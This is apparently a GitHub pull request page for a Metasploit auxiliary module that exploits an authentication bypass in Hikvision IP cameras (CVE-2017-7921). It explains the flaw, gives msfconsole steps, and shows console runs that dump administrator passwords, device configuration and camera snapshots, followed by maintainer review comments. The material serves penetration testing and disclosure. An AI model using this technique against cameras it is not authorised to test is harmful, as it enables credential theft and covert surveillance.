metasploit-framework
metasploit-framework copied to clipboard
rapid7
Hikvision camera unauthenticated information disclosure
Many Hikvision IP cameras have improper authorization logic that allows unauthenticated information disclosure of camera information, such as detailed hardware and software configuration, user credentials, and camera snapshots.
This module allows the attacker to disclose this information without the need of authenticaton by utilizing the
improper authentication logic to send a request to the server which contains an auth parameter in the query string
containing a Base64 encoded version of the authorization in username:password format.
Vulnerable cameras will ignore the password parameter and will instead use the username part of this string
as the user to log in. Using user admin will allow an attacker to retrieve and disclose any information
of the targeted device.
The vulnerability has been present in Hikvision products since 2014. In addition to Hikvision-branded devices, it affects many white-labeled camera products sold under a variety of brand names.
Verification
List the steps needed to make sure this thing works
- [ ] Start
msfconsole - [ ]
use auxiliary/gather/hikvision_info_disclosure_cve_2017_7921 - [ ]
set RHOSTS <TARGET HOSTS> - [ ]
set RPORT <port> - [ ]
set PRINT true - [ ]
set ACTION Automatic - [ ]
run
You should get a full disclosure of all camera information supported by this module.
Specific Hardware Examples: This module has been tested against a Hikvision camera with the specifications listed below:
- MANUFACTURER: Hikvision.China
- MODEL: DS-2CD2142FWD-IS
- FIRMWARE VERSION: V5.4.1
- FIRMWARE RELEASE: build 160525
- BOOT VERSION: V1.3.4
- BOOT RELEASE: 100316
Options
This option allows you print all information collected to the console during execution except for camera snapshots.
Actions
Automatic
Retrieves all information supported by this module
Configuration
Retrieves the camera hardware and software configuration
Credentials
Retrieves all configured users including the passwords in plain text format and stores them in the database.
This can be checked by using the command creds -O <target IP> at the Metasploit prompt.
Snapshot
Takes a camera snapshot and stores it as a JPEG file in loot.
All information disclosed is by default stored in loot
Scenarios
Hikvision Camera DS-2CD2142FWD-IS -> firmware version V5.4.1, build 160525
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > set rhosts 192.168.100.180
rhosts => 192.168.100.180
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > set ACTION Automatic
ACTION => Automatic
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > set PRINT true
PRINT => true
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > options
Module options (auxiliary/gather/hikvision_info_disclosure_cve_2017_7921):
Name Current Setting Required Description
---- --------------- -------- -----------
PRINT true no Print output to console (not applicable for snapshot)
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.100.180 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Met>
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Auxiliary action:
Name Description
---- -----------
Automatic Dump all information
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > check
[+] 192.168.100.180:80 - The target is vulnerable.
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > run
[*] Running module against 192.168.100.180
[*] Running in automatic mode
[*] Getting the user credentials...
[*] Credentials for user:admin are added to the database...
[*] Credentials for user:admln are added to the database...
[*] User Credentials Information:
-----------------------------
Username:admin | ID:1 | Role:Administrator | Password: Pa$$W0rd
Username:admln | ID:2 | Role:Operator | Password: asdf1234
[+] User credentials are successfully saved to /root/.msf4/loot/20221002172346_default_192.168.100.180_hikvision.creden_0492>
[*] Getting the camera hardware and software configuration...
[*] Camera Device Information:
--------------------------
Device name: IP CAMERA
Device ID: 88
Device description: IPCamera
Device manufacturer: Hikvision.China
Device model: DS-2CD2142FWD-IS
Device S/N: DS-2CD2142FWD-IS2016HS7777777777
Device MAC: bc:ad:28:ff:ff:ff
Device firware version: V5.4.1
Device firmware release: build 160525
Device boot version: V1.3.4
Device boot release: 100316
Device hardware version: 0x0
Camera Network Information:
---------------------------
IP interface: 1
IP version: v4
IP assignment: static
IP address: 192.168.100.180
IP subnet mask: 255.255.255.0
Default gateway: 192.168.100.1
Primary DNS: 8.8.8.8
Camera Storage Information:
---------------------------
Storage volume name: HDD1
Storage volume ID: 1
Storage volume description: DAS
Storage device: HDD
Storage type: internal
Storage capacity (MB): 30543
Storage device status: HD_NORMAL
[+] Camera configuration details are successfully saved to /root/.msf4/loot/20221002172347_default_192.168.100.180_hikvision>
[*] Taking a camera snapshot...
[+] Camera snapshot is successfully saved to /root/.msf4/loot/20221002172348_default_192.168.100.180_hikvision.image_963468.>
[*] Auxiliary module execution completed
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > creds -O 192.168.100.180
Credentials
===========
host origin service public private realm private_type JtR Format
---- ------ ------- ------ ------- ----- ------------ ----------
192.168.100.180 192.168.100.180 80/tcp (http) admln asdf1234 Password
192.168.100.180 192.168.100.180 80/tcp (http) admin Pa$$W0rd Password
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) >
Limitations
No limitations are identified so far using this module.
This looks really nice.
A recommendation on how to report the credentials via existing mixin support.
Also based on the repeating comments I made I think this could be refactored to have helper methods that take a
blockor some other pattern to reduce the code that needs to be maintained a bit. (Note refactoring is not a requirement for landing just a something that may aid in maintenance down the line.)
Hi @jmartin-r7, Thanks for your comments and I accepted your suggestions for improvement. However I do see some errors now in the commits you suggested...
@h00die-gr3y, thanks for taking a look, the suggestions were not tested code just a way or providing examples diff inline on the PR. Please do test any changes you incorporate to validate them.
@h00die-gr3y, thanks for taking a look, the suggestions were not tested code just a way or providing examples diff inline on the PR. Please do test any changes you incorporate to validate them.
@jmartin-r7, Got it. I already incorporated all the changes suggested in the latest commit ae0f94b and tested it thoroughly. The code is good to go...
Thanks for updating this @h00die-gr3y ! It looks good to me. I just left a couple of comments about a possible issue in validation logics before storing data in the loot. I missed those during my first review.
I believe there is no possible way to test this unless you own a vulnerable device. So, in order for us to validate this module works as expected, would you mind running the module with the option
HttpTraceset totrueand sending the console output as a comment in this PR? Don't forget to change/obfuscate any sensitive information in the output (IP addresses, credentials etc.). Also, please include the MSF database content by running db command likecreds,hosts,services,loot, etc. before and after the module has run. Note that, if the output is too big, you can send it to the Metasploit mailing list (msfdev [at] metasploit [.] com) with the corresponding reference (PR title and number). Thanks!
@cdelafuente-r7, I do have a vulnerable device that I use for testing. I can send you a network trace (pcap file) capturing the module run for you to inspect if all is working fine including the creds, loot, services and hosts output... Would that suffice?
@h00die-gr3y, sure, that is fine. The only thing is that obfuscating sensitive data in a PCAP might be challenging. If it is not a problem or if there is no sensitive data, the PCAP is fine. It can be sent to the Metasploit mailing list (msfdev [at] metasploit [.] com) with the corresponding reference (PR title and number). Thanks!
@h00die-gr3y, sure, that is fine. The only thing is that obfuscating sensitive data in a PCAP might be challenging. If it is not a problem or if there is no sensitive data, the PCAP is fine. It can be sent to the Metasploit mailing list (msfdev [at] metasploit [.] com) with the corresponding reference (PR title and number). Thanks!
Hi @cdelafuente-r7
I have run the module again and took a network trace with wireshark.
I have posted it as requested on the mail with the PR reference.
Down here you can find the full run of the module at the msf console with the output of loot and creds as requested.
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > creds -O 192.168.100.2
Credentials
===========
host origin service public private realm private_type JtR Format
---- ------ ------- ------ ------- ----- ------------ ----------
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > loot
Loot
====
host service type name content info path
---- ------- ---- ---- ------- ---- ----
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > options
Module options (auxiliary/gather/hikvision_info_disclosure_cve_2017_7921):
Name Current Setting Required Description
---- --------------- -------- -----------
PRINT true no Print output to console (not applicable for snapshot)
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.100.2 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Auxiliary action:
Name Description
---- -----------
Automatic Dump all information
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > exploit
[*] Running module against 192.168.100.2
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Running in automatic mode
[*] Getting the user credentials...
[*] Credentials for user:admin are added to the database...
[*] Credentials for user:admln are added to the database...
[*] User Credentials Information:
-----------------------------
User:admin | ID:1 | Role:Administrator | Password: Pa$$W0rd
User:admln | ID:2 | Role:Operator | Password: asdf1234
[+] User credentials are successfully saved to /root/.msf4/loot/20221019095549_default_192.168.100.2_hikvision.creden_931301.txt
[*] Getting the camera hardware and software configuration...
[*] Camera Device Information:
--------------------------
Device name: IP CAMERA
Device ID: 88
Device description: IPCamera
Device manufacturer: Hikvision.China
Device model: DS-2CD2142FWD-IS
Device S/N: DS-2CD2142FWD-IS201677777777777777777
Device MAC: bc:ad:28:ff:ff:ff
Device firware version: V5.4.1
Device firmware release: build 160525
Device boot version: V1.3.4
Device boot release: 100316
Device hardware version: 0x0
Camera Network Information:
---------------------------
IP interface: 1
IP version: v4
IP assignment: static
IP address: 192.168.100.2
IP subnet mask: 255.255.255.0
Default gateway: 192.168.100.1
Primary DNS: 8.8.8.8
Camera Storage Information:
---------------------------
Storage volume name: HDD1
Storage volume ID: 1
Storage volume description: DAS
Storage device: HDD
Storage type: internal
Storage capacity (MB): 30543
Storage device status: HD_NORMAL
[+] Camera configuration details are successfully saved to /root/.msf4/loot/20221019095550_default_192.168.100.2_hikvision.config_350877.txt
[*] Taking a camera snapshot...
[+] Camera snapshot is successfully saved to /root/.msf4/loot/20221019095551_default_192.168.100.2_hikvision.image_592929.bin
[*] Auxiliary module execution completed
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > loot
Loot
====
host service type name content info path
---- ------- ---- ---- ------- ---- ----
192.168.100.2 hikvision.credential credentials text/plain leaked credentials /root/.msf4/loot/20221019095549_default_192.168.100.2_hikvision.creden_931301.txt
192.168.100.2 hikvision.config configuration text/plain camera configuration /root/.msf4/loot/20221019095550_default_192.168.100.2_hikvision.config_350877.txt
192.168.100.2 hikvision.image snapshot jpeg/image camera snapshot /root/.msf4/loot/20221019095551_default_192.168.100.2_hikvision.image_592929.bin
msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > creds -O 192.168.100.2
Credentials
===========
host origin service public private realm private_type JtR Format
---- ------ ------- ------ ------- ----- ------------ ----------
192.168.100.2 192.168.100.2 80/tcp (http) admln asdf1234 Password
192.168.100.2 192.168.100.2 80/tcp (http) admin Pa$$W0rd Password
Everything looks good to me. I'll go ahead and land it. Thanks again for your contribution.
Release Notes
This adds an auxiliary module that leverages an authentication bypass vulnerability in Hikvision IP cameras (CVE-2017-7921) to disclose information such as detailed hardware and software configuration, user credentials, and camera snapshots.